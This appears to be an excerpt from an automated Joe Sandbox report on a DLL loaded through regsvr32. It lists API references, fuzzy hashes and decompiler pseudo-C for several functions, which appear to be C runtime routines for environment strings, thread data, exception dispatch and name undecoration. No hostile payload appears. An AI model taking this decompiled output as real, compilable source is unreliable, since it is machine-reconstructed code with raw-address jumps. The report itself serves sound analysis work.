Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: Name::operator+=$NameName::appendName::operator=Node::makeStatus
String ID:
API String ID: 686042019-0
Opcode ID: 7f119c2f728e663512a21fad36a58f8b4bb160e8e67cfffcd570b793229b76e1
Instruction ID: 7d971b667adc039612c5a266bb5fd262612418e63792468f5597df808aa66d82
Opcode Fuzzy Hash: 7f119c2f728e663512a21fad36a58f8b4bb160e8e67cfffcd570b793229b76e1
Instruction Fuzzy Hash: 4E4192A2F1E68299F7239B25DE633786650AB42B84F444131D64E0B7F5CFACE881D7C0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B0688D0 Relevance: 9.1, APIs: 6, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FFD2B0659B5), ref: 00007FFD2B0688E9
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FFD2B0659B5), ref: 00007FFD2B068940
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FFD2B0659B5), ref: 00007FFD2B06897B
free.LIBCMT ref: 00007FFD2B068988
FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FFD2B0659B5), ref: 00007FFD2B068993
FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FFD2B0659B5), ref: 00007FFD2B0689A1

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: EnvironmentStrings$ByteCharFreeMultiWide$free
String ID:
API String ID: 517548149-0
Opcode ID: b2b9c43db829d3a4119f1860b20af2ae59217770f507bb3298b768e750526c84
Instruction ID: 1fd606b965e4be0282c21e5512e0f18496d09e3e8589ee580cf3b1cfe8965550
Opcode Fuzzy Hash: b2b9c43db829d3a4119f1860b20af2ae59217770f507bb3298b768e750526c84
Instruction Fuzzy Hash: 08218332B0AB8185EB269F12A92106977E4FB89BC0B0C4039DECE07B64DF7CE550DB45

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B067ED8 Relevance: 9.0, APIs: 6, Instructions: 37threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FFD2B0676A1,?,?,?,?,00007FFD2B065382,?,?,?,00007FFD2B064F2A), ref: 00007FFD2B067EE2
FlsGetValue.KERNEL32(?,?,?,00007FFD2B0676A1,?,?,?,?,00007FFD2B065382,?,?,?,00007FFD2B064F2A), ref: 00007FFD2B067EF0
SetLastError.KERNEL32(?,?,?,00007FFD2B0676A1,?,?,?,?,00007FFD2B065382,?,?,?,00007FFD2B064F2A), ref: 00007FFD2B067F48

Part of subcall function 00007FFD2B06796C: Sleep.KERNEL32(?,?,?,00007FFD2B067F0B,?,?,?,00007FFD2B0676A1,?,?,?,?,00007FFD2B065382), ref: 00007FFD2B0679B1

FlsSetValue.KERNEL32(?,?,?,00007FFD2B0676A1,?,?,?,?,00007FFD2B065382,?,?,?,00007FFD2B064F2A), ref: 00007FFD2B067F1C
free.LIBCMT ref: 00007FFD2B067F3F

Part of subcall function 00007FFD2B067E20: _lock.LIBCMT ref: 00007FFD2B067E74
Part of subcall function 00007FFD2B067E20: _lock.LIBCMT ref: 00007FFD2B067E93

GetCurrentThreadId.KERNEL32 ref: 00007FFD2B067F30

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: ErrorLastValue_lock$CurrentSleepThreadfree
String ID:
API String ID: 3106088686-0
Opcode ID: fa859107910109a155dbf600c95d40e56401b10a38e9f5d4afe29130ea1b7547
Instruction ID: d8eaaf248209f21d49c69d005958aa76dd7142faff6090f45a069c49b4f1a272
Opcode Fuzzy Hash: fa859107910109a155dbf600c95d40e56401b10a38e9f5d4afe29130ea1b7547
Instruction Fuzzy Hash: 09015230B0AB0386FA179F659E6543922D1AF4EB60B144634DD6D063F5EE7CB904A2A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B07FEF8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 143
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E00007FFD7FFD2B07FEF8(void* __ebx, void* __ecx, void* __rax, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __r8, signed long long __r9) {
				void* __rsi;
				void* __rbp;
				void* _t92;
				intOrPtr _t99;
				intOrPtr _t100;
				void* _t117;
				long long _t120;
				void* _t121;
				void* _t122;
				signed int* _t162;
				intOrPtr* _t166;
				long long _t169;
				void* _t171;
				void* _t172;
				long long _t184;
				signed long long _t187;
				void* _t190;

				_t117 = __rax;
				_t94 = __ecx;
				 *((long long*)(_t171 + 0x10)) = __rbx;
				 *((long long*)(_t171 + 0x18)) = __r8;
				_t172 = _t171 - 0x60;
				_t187 = __r9;
				_t190 = __rdx;
				_t166 = __rcx;
				if ( *__rcx == 0x80000003) goto 0x2b080118;
				E00007FFD7FFD2B067F5C(__ecx,  *__rcx - 0x80000003, __rax, __rcx, __rcx, __r8);
				_t100 =  *((intOrPtr*)(_t172 + 0xd0));
				_t169 =  *((intOrPtr*)(_t172 + 0xc0));
				if ( *((long long*)(_t117 + 0xe0)) == 0) goto 0x2b07ff9c;
				E00007FFD7FFD2B067F5C(_t94,  *((long long*)(_t117 + 0xe0)), _t117, __rcx, __rcx, __r8);
				E00007FFD7FFD2B067DD0();
				if ( *((intOrPtr*)(_t117 + 0xe0)) == _t117) goto 0x2b07ff9c;
				if ( *__rcx == 0xe0434f4d) goto 0x2b07ff9c;
				if ( *__rcx == 0xe0434352) goto 0x2b07ff9c;
				 *(_t172 + 0x30) =  *((intOrPtr*)(_t172 + 0xd8));
				 *((intOrPtr*)(_t172 + 0x28)) = _t100;
				 *((long long*)(_t172 + 0x20)) = _t169;
				if (E00007FFD7FFD2B07E88C(_t94, __rcx, __rdx, __r8, __r9) != 0) goto 0x2b080118;
				if ( *((intOrPtr*)(_t169 + 0xc)) != 0) goto 0x2b07ffa7;
				E00007FFD7FFD2B072484( *((intOrPtr*)(_t172 + 0xd8)));
				r12d =  *((intOrPtr*)(_t172 + 0xc8));
				 *(_t172 + 0x30) = __r9;
				 *((long long*)(_t172 + 0x28)) = _t172 + 0x50;
				_t120 = _t172 + 0xa0;
				r8d = _t100;
				r9d = r12d;
				 *((long long*)(_t172 + 0x20)) = _t120;
				E00007FFD7FFD2B07E8E0(__ebx, _t120, _t117, _t169, _t166);
				if ( *((intOrPtr*)(_t172 + 0xa0)) -  *((intOrPtr*)(_t172 + 0x50)) >= 0) goto 0x2b080118;
				_t20 = _t120 + 0xc; // 0xc
				_t162 = _t20;
				_t21 = _t162 - 0xc; // 0x0
				_t184 = _t21;
				if (r12d -  *_t184 < 0) goto 0x2b080101;
				if (r12d -  *((intOrPtr*)(_t162 - 8)) > 0) goto 0x2b080101;
				E00007FFD7FFD2B07E4B4(_t120);
				if ( *((intOrPtr*)(_t120 + _t162[1] + ( *_t162 +  *_t162 * 4) * 4 - 0x10)) == 0) goto 0x2b080047;
				E00007FFD7FFD2B07E4B4(_t120);
				E00007FFD7FFD2B07E4B4(_t120);
				_t121 = _t120 +  *((intOrPtr*)(_t120 + _t162[1] + ( *_t162 +  *_t162 * 4) * 4 - 0x10));
				goto 0x2b080049;
				if (_t121 == 0) goto 0x2b080094;
				E00007FFD7FFD2B07E4B4(_t121);
				if ( *((intOrPtr*)(_t121 + _t162[1] + ( *_t162 +  *_t162 * 4) * 4 - 0x10)) == 0) goto 0x2b08008c;
				E00007FFD7FFD2B07E4B4(_t121);
				E00007FFD7FFD2B07E4B4(_t121);
				_t122 = _t121 +  *((intOrPtr*)(_t121 + _t162[1] + ( *_t162 +  *_t162 * 4) * 4 - 0x10));
				goto 0x2b08008e;
				if ( *((char*)(_t122 + 0x10)) != 0) goto 0x2b0800fa;
				E00007FFD7FFD2B07E4B4(_t122);
				if (( *(_t122 + _t162[1] + ( *_t162 +  *_t162 * 4) * 4 - 0x14) & 0x00000040) != 0) goto 0x2b0800fa;
				E00007FFD7FFD2B07E4B4(_t122);
				 *((char*)(_t172 + 0x40)) = 0;
				 *((long long*)(_t172 + 0x38)) = _t184;
				 *(_t172 + 0x30) =  *(_t172 + 0x30) & 0x00000000;
				 *((long long*)(_t172 + 0x28)) = _t122 + ( *_t162 - 1 + ( *_t162 - 1) * 4) * 4 + _t162[1];
				 *((long long*)(_t172 + 0x20)) = _t169;
				_t92 = E00007FFD7FFD2B07FE34(_t100,  *((intOrPtr*)(_t121 + _t162[1] + ( *_t162 +  *_t162 * 4) * 4 - 0x10)), _t166, _t190, _t169,  *((intOrPtr*)(_t172 + 0xb0)), _t187);
				_t99 =  *((intOrPtr*)(_t172 + 0xa0)) + 1;
				 *((intOrPtr*)(_t172 + 0xa0)) = _t99;
				if (_t99 -  *((intOrPtr*)(_t172 + 0x50)) < 0) goto 0x2b07fff1;
				return _t92;
			}

0x7ffd2b07fef8
0x7ffd2b07fef8
0x7ffd2b07fef8
0x7ffd2b07fefd
0x7ffd2b07ff0d
0x7ffd2b07ff17
0x7ffd2b07ff1d
0x7ffd2b07ff20
0x7ffd2b07ff23
0x7ffd2b07ff29
0x7ffd2b07ff2e
0x7ffd2b07ff35
0x7ffd2b07ff45
0x7ffd2b07ff47
0x7ffd2b07ff4f
0x7ffd2b07ff5b
0x7ffd2b07ff63
0x7ffd2b07ff6b
0x7ffd2b07ff7b
0x7ffd2b07ff86
0x7ffd2b07ff8a
0x7ffd2b07ff96
0x7ffd2b07ffa0
0x7ffd2b07ffa2
0x7ffd2b07ffa7
0x7ffd2b07ffb4
0x7ffd2b07ffb9
0x7ffd2b07ffbe
0x7ffd2b07ffc6
0x7ffd2b07ffc9
0x7ffd2b07ffd2
0x7ffd2b07ffd7
0x7ffd2b07ffe7
0x7ffd2b07ffed
0x7ffd2b07ffed
0x7ffd2b07fff1
0x7ffd2b07fff1
0x7ffd2b07fff9
0x7ffd2b080003
0x7ffd2b080009
0x7ffd2b080022
0x7ffd2b080024
0x7ffd2b08003d
0x7ffd2b080042
0x7ffd2b080045
0x7ffd2b08004c
0x7ffd2b08004e
0x7ffd2b080067
0x7ffd2b080069
0x7ffd2b080082
0x7ffd2b080087
0x7ffd2b08008a
0x7ffd2b080092
0x7ffd2b080094
0x7ffd2b0800ad
0x7ffd2b0800af
0x7ffd2b0800c0
0x7ffd2b0800c5
0x7ffd2b0800ca
0x7ffd2b0800e8
0x7ffd2b0800f0
0x7ffd2b0800f5
0x7ffd2b080101
0x7ffd2b080107
0x7ffd2b080112
0x7ffd2b08012f

APIs

_getptd.LIBCMT ref: 00007FFD2B07FF29

Part of subcall function 00007FFD2B067F5C: _amsg_exit.LIBCMT ref: 00007FFD2B067F72

_getptd.LIBCMT ref: 00007FFD2B07FF47
_CallSETranslator.LIBCMT ref: 00007FFD2B07FF8F

Part of subcall function 00007FFD2B07E88C: _getptd.LIBCMT ref: 00007FFD2B07E8B3

Strings

MOC, xrefs: 00007FFD2B07FF5D
RCC, xrefs: 00007FFD2B07FF65

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: _getptd$CallTranslator_amsg_exit
String ID: MOC$RCC
API String ID: 1374396951-2084237596
Opcode ID: 31f5d29dc048c02c4b33c61762bf3504d95a3f193984edda05dd825bf4ca7d39
Instruction ID: e59248758c58f300bffbffcf5fcf59ff9ed7161d8196da80406ecd2031844a1e
Opcode Fuzzy Hash: 31f5d29dc048c02c4b33c61762bf3504d95a3f193984edda05dd825bf4ca7d39
Instruction Fuzzy Hash: 67619072B0AAC285DA21CB04D9A07BDB360FF82B88F144535DB4E476A5DFBCE151D780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B07F861 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00007FFD7FFD2B07F861(void* __ecx, void* __eflags, void* __rax, void* __rcx, void* __rsi, void* __rbp, void* __r8, intOrPtr _a32, intOrPtr _a56, intOrPtr _a64, intOrPtr _a72, intOrPtr _a80, intOrPtr* _a96, intOrPtr _a192, intOrPtr* _a200, long long _a208, long long _a216) {
				void* _t35;
				void* _t52;
				intOrPtr* _t67;

				_t52 = __rax;
				_a32 = 1;
				E00007FFD7FFD2B067F5C(__ecx, __eflags, __rax, __rcx, __rsi, __r8);
				 *(_t52 + 0x2c0) =  *(_t52 + 0x2c0) & 0x00000000;
				_t67 = _a200;
				if (_a192 == 0) goto 0x2b07f8a7;
				E00007FFD7FFD2B07F1C0(1, _t67);
				r8d =  *((intOrPtr*)(_a64 + 0x18));
				goto 0x2b07f8b4;
				r8d =  *((intOrPtr*)(_t67 + 0x18));
				RaiseException(??, ??, ??, ??);
				r13d = _a32;
				E00007FFD7FFD2B07EA84( *_t67, _a192, _t52, _a72, _a80, _t67, __rbp, __r8);
				if (r13d != 0) goto 0x2b07f92b;
				if ( *_t67 != 0xe06d7363) goto 0x2b07f92b;
				if ( *((intOrPtr*)(_t67 + 0x18)) != 4) goto 0x2b07f92b;
				if ( *((intOrPtr*)(_t67 + 0x20)) == 0x19930520) goto 0x2b07f914;
				if ( *((intOrPtr*)(_t67 + 0x20)) == 0x19930521) goto 0x2b07f914;
				if ( *((intOrPtr*)(_t67 + 0x20)) != 0x19930522) goto 0x2b07f92b;
				if (E00007FFD7FFD2B07EA50( *((intOrPtr*)(_t67 + 0x20)) - 0x19930522, _t52,  *((intOrPtr*)(_t67 + 0x28))) == 0) goto 0x2b07f92b;
				E00007FFD7FFD2B07F1C0(1, _t67);
				E00007FFD7FFD2B067F5C( *_t67, E00007FFD7FFD2B07EA50( *((intOrPtr*)(_t67 + 0x20)) - 0x19930522, _t52,  *((intOrPtr*)(_t67 + 0x28))), _t52, _t67, _t67, __r8);
				 *((long long*)(_t52 + 0xf0)) = _a208;
				_t35 = E00007FFD7FFD2B067F5C( *_t67, E00007FFD7FFD2B07EA50( *((intOrPtr*)(_t67 + 0x20)) - 0x19930522, _t52,  *((intOrPtr*)(_t67 + 0x28))), _t52, _t67, _t67, __r8);
				 *((long long*)(_t52 + 0xf8)) = _a216;
				 *((long long*)( *((intOrPtr*)(_a56 + 0x1c)) +  *_a96)) = 0xfffffffe;
				return _t35;
			}

0x7ffd2b07f861
0x7ffd2b07f861
0x7ffd2b07f869
0x7ffd2b07f86e
0x7ffd2b07f875
0x7ffd2b07f885
0x7ffd2b07f88c
0x7ffd2b07f89a
0x7ffd2b07f8a5
0x7ffd2b07f8ab
0x7ffd2b07f8b4
0x7ffd2b07f8ba
0x7ffd2b07f8e1
0x7ffd2b07f8e9
0x7ffd2b07f8f1
0x7ffd2b07f8f7
0x7ffd2b07f900
0x7ffd2b07f909
0x7ffd2b07f912
0x7ffd2b07f91f
0x7ffd2b07f926
0x7ffd2b07f92b
0x7ffd2b07f930
0x7ffd2b07f937
0x7ffd2b07f93c
0x7ffd2b07f950
0x7ffd2b07f96d

APIs

RaiseException.KERNEL32 ref: 00007FFD2B07F8B4
_getptd.LIBCMT ref: 00007FFD2B07F869

Part of subcall function 00007FFD2B067F5C: _amsg_exit.LIBCMT ref: 00007FFD2B067F72

_getptd.LIBCMT ref: 00007FFD2B07F92B
_getptd.LIBCMT ref: 00007FFD2B07F937

Strings

csm, xrefs: 00007FFD2B07F8EB

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: _getptd$ExceptionRaise_amsg_exit
String ID: csm
API String ID: 4155239085-1018135373
Opcode ID: c720a69a8dfa12875f701ee6b3a2c8951e49c0eb2fb37e6c94c5a608e604f258
Instruction ID: 913dcff3f640aae559d6e5efbb5ff2d0f35780d07b100cc4e38a968a422c53d5
Opcode Fuzzy Hash: c720a69a8dfa12875f701ee6b3a2c8951e49c0eb2fb37e6c94c5a608e604f258
Instruction Fuzzy Hash: D331933660968286E631DF16E56076EB3A0FB4A765F044231DF9E037A1CF7DE845EB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B07027C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 77%

			E00007FFD7FFD2B07027C(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, long long __rax, long long __rbx, long long __rcx, void* __rdx, void* __rdi, long long __rsi, void* __r8, void* __r10, void* __r12, long long _a8) {
				char _v24;
				signed int _v32;
				char _v40;
				char _v56;
				intOrPtr _v72;
				intOrPtr _t20;
				void* _t26;
				long long _t36;
				long long _t39;
				char* _t65;
				long long _t66;

				_t36 = __rax;
				_t26 = __edx;
				_a8 = __rbx;
				_t39 = __rcx;
				_t2 =  &_v56; // -79
				E00007FFD7FFD2B06A418(__rax, __rcx, _t2, __rdx, __r8);
				_t65 =  *0x2b0c9a70; // 0x0
				if ( *_t65 == 0) goto 0x2b070332;
				if ( *_t65 == 0x3f) goto 0x2b0702f7;
				if ( *_t65 == 0x58) goto 0x2b0702c4;
				_t3 =  &_v56; // -79
				E00007FFD7FFD2B07006C(__ebx, __ecx, _t26, __esi, _t36, __rcx, __rcx, _t3, __rdi, __rsi, __r8, __r10, _t65, __r12);
				goto 0x2b070353;
				_t66 = _t65 + 1;
				 *0x2b0c9a70 = _t66;
				if (_v56 != _t36) goto 0x2b0702e5;
				E00007FFD7FFD2B06A9E0(_t39, "void");
				goto 0x2b070353;
				_t5 =  &_v40; // -63
				_t20 = E00007FFD7FFD2B06A9E0(_t5, "void ");
				goto 0x2b070340;
				_v32 = _v32 & 0xffff0000;
				_t8 =  &_v40; // -63
				_t9 =  &_v56; // -79
				_t10 =  &_v24; // -47
				 *0x2b0c9a70 = _t66 + 1;
				_v40 = _t36;
				_v72 = _t20;
				E00007FFD7FFD2B06EFA4(_t39, _t10, _t9, __rsi, 0x2b08398d, _t8, __r10, _t66 + 1);
				asm("movups xmm0, [eax]");
				asm("movdqu [ebp-0x30], xmm0");
				goto 0x2b0702b3;
				_t13 =  &_v40; // -63
				E00007FFD7FFD2B06A490(1, _t36, _t13);
				asm("movups xmm0, [eax]");
				_t14 =  &_v56; // -79
				asm("movdqu [ebx], xmm0");
				return E00007FFD7FFD2B06AC78(_t36, _t39, _t14);
			}

0x7ffd2b07027c
0x7ffd2b07027c
0x7ffd2b07027c
0x7ffd2b070289
0x7ffd2b07028c
0x7ffd2b070290
0x7ffd2b070295
0x7ffd2b0702a1
0x7ffd2b0702ab
0x7ffd2b0702b1
0x7ffd2b0702b3
0x7ffd2b0702ba
0x7ffd2b0702bf
0x7ffd2b0702c4
0x7ffd2b0702c7
0x7ffd2b0702d2
0x7ffd2b0702de
0x7ffd2b0702e3
0x7ffd2b0702ec
0x7ffd2b0702f0
0x7ffd2b0702f5
0x7ffd2b0702f7
0x7ffd2b070301
0x7ffd2b07030c
0x7ffd2b070310
0x7ffd2b070314
0x7ffd2b07031b
0x7ffd2b07031f
0x7ffd2b070323
0x7ffd2b070328
0x7ffd2b07032b
0x7ffd2b070330
0x7ffd2b070332
0x7ffd2b07033b
0x7ffd2b070340
0x7ffd2b070343
0x7ffd2b07034a
0x7ffd2b070360

APIs

DName::DName.LIBCMT ref: 00007FFD2B0702DE
DName::DName.LIBCMT ref: 00007FFD2B0702F0

Part of subcall function 00007FFD2B06A9E0: DName::doPchar.LIBCMT ref: 00007FFD2B06AA19

DName::operator+=.LIBCMT ref: 00007FFD2B07034E

Strings

void , xrefs: 00007FFD2B0702E5
void, xrefs: 00007FFD2B0702D4

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: NameName::$Name::doName::operator+=Pchar
String ID: void$void
API String ID: 1070866305-3746155364
Opcode ID: 20db89e7c28dedfa57394d69a0078c1c452a18b48af22bf9f4d007e9861a8803
Instruction ID: 3850cce0fdf9628f2fa5f1a6c2e1fe7fffb573d6235e9860dcc641e693555a50
Opcode Fuzzy Hash: 20db89e7c28dedfa57394d69a0078c1c452a18b48af22bf9f4d007e9861a8803
Instruction Fuzzy Hash: 2A21A262F1AA5688FB13DB70DD614BC6360FB46344F444131EA4E166A6EFBCE545E380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B0767A8 Relevance: 7.7, APIs: 5, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00007FFD7FFD2B0767A8(signed int* __rbx, long long __rcx, void* __rdx, signed int __rsi, void* __r9) {
				void* __rdi;
				signed int _t48;
				signed int _t49;
				signed int _t50;
				signed int _t51;
				signed int _t52;
				char _t55;
				char _t56;
				char _t57;
				signed int _t75;
				signed int* _t81;
				signed int* _t89;
				signed int* _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t97;
				signed int _t98;
				signed int* _t100;
				char* _t120;
				char* _t121;
				void* _t122;
				long long _t125;
				signed int _t127;
				signed int* _t129;
				signed int* _t131;
				void* _t132;
				char* _t135;
				void* _t137;
				void* _t139;
				void* _t141;
				signed int* _t143;
				void* _t145;
				signed int* _t146;
				void* _t148;
				signed int* _t149;

				_t137 = __r9;
				_t100 = __rbx;
				_t91 = _t131;
				_t91[2] = __rbx;
				_t91[4] = _t127;
				_t91[6] = __rsi;
				_t132 = _t131 - 0x40;
				_t125 = __rcx;
				 *((long long*)(_t91 - 0x38)) = __rcx;
				 *((long long*)(_t91 - 0x30)) = __rbx;
				if ( *((intOrPtr*)(__rcx + 0x1c)) != 0) goto 0x2b0767ed;
				if ( *((intOrPtr*)(__rcx + 0x18)) != 0) goto 0x2b0767ed;
				r13d = 0;
				r14d = 0;
				goto 0x2b0769a3;
				r12d = 1;
				E00007FFD7FFD2B06796C(__rbx, __rcx, __rdx, _t122, __rcx, 0x2b0c8490, _t148, _t145);
				_t129 = _t91;
				if (_t91 != 0) goto 0x2b076812;
				goto 0x2b0769f2;
				_t134 = _t122;
				E00007FFD7FFD2B064B80(r12d, _t91, _t91,  *(_t125 + 0x128), _t122);
				E00007FFD7FFD2B0678EC(4, _t91, _t100, _t91, _t122, _t125);
				_t146 = _t91;
				if (_t91 != 0) goto 0x2b076842;
				free(_t141);
				goto 0x2b07680a;
				 *_t91 = 0;
				if ( *((intOrPtr*)(_t125 + 0x1c)) == 0) goto 0x2b07695d;
				E00007FFD7FFD2B0678EC(4,  *((intOrPtr*)(_t125 + 0x1c)), _t100, _t122, _t122, _t125);
				_t81 = _t91;
				if (_t81 == 0) goto 0x2b076918;
				 *_t91 = 0;
				_t75 =  *(_t125 + 0x3e) & 0x0000ffff;
				_t11 = _t132 + 0x30; // 0x31
				r9d = 0xe;
				r8d = _t75;
				 *(_t132 + 0x20) = _t129;
				_t48 = E00007FFD7FFD2B072BF4(r12d, _t11, _t122);
				_t13 =  &(_t129[2]); // 0x8
				 *(_t132 + 0x20) = _t13;
				_t15 = _t132 + 0x30; // 0x31
				r9d = 0xf;
				r8d = _t75;
				_t49 = E00007FFD7FFD2B072BF4(r12d, _t15, _t122);
				_t16 =  &(_t129[4]); // 0x10
				_t149 = _t16;
				_t17 = _t132 + 0x30; // 0x31
				r9d = 0x10;
				r8d = _t75;
				 *(_t132 + 0x20) = _t149;
				_t50 = E00007FFD7FFD2B072BF4(r12d, _t17, _t122);
				r9d = 0xe;
				_t19 =  &(_t129[0x16]); // 0x58
				_t20 = _t132 + 0x30; // 0x31
				r8d = _t75;
				 *(_t132 + 0x20) = _t19;
				_t51 = E00007FFD7FFD2B072BF4(_t137 - 0xc, _t20, _t122);
				r9d = 0xf;
				_t23 =  &(_t129[0x18]); // 0x60
				_t24 = _t132 + 0x30; // 0x31
				r8d = _t75;
				 *(_t132 + 0x20) = _t23;
				_t52 = E00007FFD7FFD2B072BF4(_t137 - 0xd, _t24, _t134);
				if (_t81 == 0) goto 0x2b076928;
				E00007FFD7FFD2B07673C(_t52 | _t48 | _t49 | _t50 | _t51, _t129);
				r12d = r12d | 0xffffffff;
				free(_t139);
				goto 0x2b07683b;
				_t120 =  *_t149;
				goto 0x2b076940;
				_t55 =  *_t120;
				if (_t55 - 0x30 < 0) goto 0x2b076946;
				if (_t55 - 0x39 > 0) goto 0x2b076946;
				_t56 = _t55 - 0x30;
				 *_t120 = _t56;
				_t121 = _t120 + _t139;
